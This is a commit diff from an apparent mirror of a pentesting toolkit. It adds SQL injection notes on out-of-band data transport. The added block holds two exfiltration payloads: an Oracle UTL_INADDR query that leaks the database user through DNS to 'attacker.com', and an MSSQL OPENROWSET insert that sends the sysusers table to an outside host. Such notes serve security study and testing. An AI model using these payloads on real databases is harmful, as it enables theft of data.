mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-02 23:05:11 -04:00
web security
This commit is contained in:
bt3gl
parent
b54f50fbe4
commit
f3a1895380
3 changed files with 293 additions and 30 deletions
|
|
@ -53,6 +53,9 @@ SELECT count (*) FROM reviews WHERE author='bob' and SUBSTRING(SYSTEM_USER,1,1)=
|
|||
|
||||
* Utilize transport outside of HTTP response.
|
||||
|
||||
```
|
||||
SELECT * FROM reviews WHERE review_author=UTL_INADDR.GET_HOST_ADDRESS((select user from dual ||'.attacker.com'));
|
||||
INSERT into openowset('sqloledb','Network=DBMSSOCN; Address=10.0.0.2,1088;uid=gds574;pwd=XXX','SELECT * from tableresults') Select name,uid,isntuser from master.dbo.sysusers--
|
||||
```
|
||||
|
||||
### Common ways of Exploitation
|
||||
|
|
|
|||
Loading…
Add table
Add a link
Reference in a new issue